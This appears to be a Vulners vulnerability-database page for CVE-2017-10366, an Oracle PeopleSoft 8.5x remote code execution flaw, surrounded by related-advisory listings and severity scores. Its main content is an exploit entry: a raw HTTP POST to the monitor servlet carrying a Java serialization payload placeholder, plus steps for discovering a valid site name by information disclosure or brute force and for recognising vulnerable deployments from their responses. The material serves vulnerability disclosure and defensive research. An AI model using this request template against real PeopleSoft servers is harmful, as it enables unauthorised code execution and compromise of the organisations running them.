Vulners
Lucene search
Oracle PeopleSoft 8.5x - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Oracle PeopleSoft 8.5x - Remote Code Execution Vulnerability | 15 Jan 201800:00 | – | zdt |
 | Unspecified Vulnerability in Oracle PeopleSoft Products PeopleSoft Enterprise PT PeopleTools Component (CNVD-2017-31835) | 24 Oct 201700:00 | – | cnvd |
 | CVE-2017-10366 | 19 Oct 201717:00 | – | cve |
 | CVE-2017-10366 | 19 Oct 201717:00 | – | cvelist |
 | Oracle PeopleSoft 8.5x - Remote Code Execution | 15 Jan 201800:00 | – | exploitpack |
 | U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website | 23 Mar 201822:15 | – | hackerone |
| U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website | 24 Mar 201802:49 | – | hackerone |
| U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website | 24 Mar 201802:59 | – | hackerone |
| U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website | 24 Mar 201803:06 | – | hackerone |
 | CVE-2017-10366 | 19 Oct 201717:29 | – | nvd |
10
# Exploit Title: RCE vulnerability in monitor service of PeopleSoft 8.54, 8.55, 8.56
# Date: 30 Oct 2017
# Exploit Author: Vahagn Vardanyan
# Vendor Homepage: Oracle
# Software Link: Oracle PeopleSoft
# Version: 8.54, 8.55, 8.56
# Tested on: Windows, Linux
# CVE : CVE-2017-10366 https://github.com/vah13/OracleCVE/tree/master/CVE-2017-10366
The RCE vulnerability present in monitor service of PeopleSoft 8.54, 8.55, 8.56.
POST /monitor/%SITE_NAME% HTTP/1.1
Host: PeopleSoft:PORT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0)
Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie:a=aa
§JAVA_SERIAL§
%SITE_NAME% - is a PeopleSoft "name" to get it you can use some information
disclosure or brute force. information for automation detection:
1. If monitor component deployed and you don't know %SITE_NAME% then
will get this type of error
<h2>Site name is not valid. Check your URL syntax and try again.</h2>
1. If %SITE_NAME% is true then you will get this message
PeopleSoft
Ping Test for Monitor Servlet
Ping successful. Site %SITE_NAME% is valid.
1. If monitor don't deployed then you will get this message
Error 404--Not Found
From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:
10.4.5 404 Not Found
The server has not found anything matching the Request-URI. No
indication is given of whether the condition is temporary or
permanent.
If the server does not wish to make this information available to the
client, the status code 403 (Forbidden) can be used instead. The 410
(Gone) status code SHOULD be used if the server knows, through some
internally configurable mechanism, that an old resource is permanently
unavailable and has no forwarding address.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2018 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 39.8
EPSS0.64382
SSVC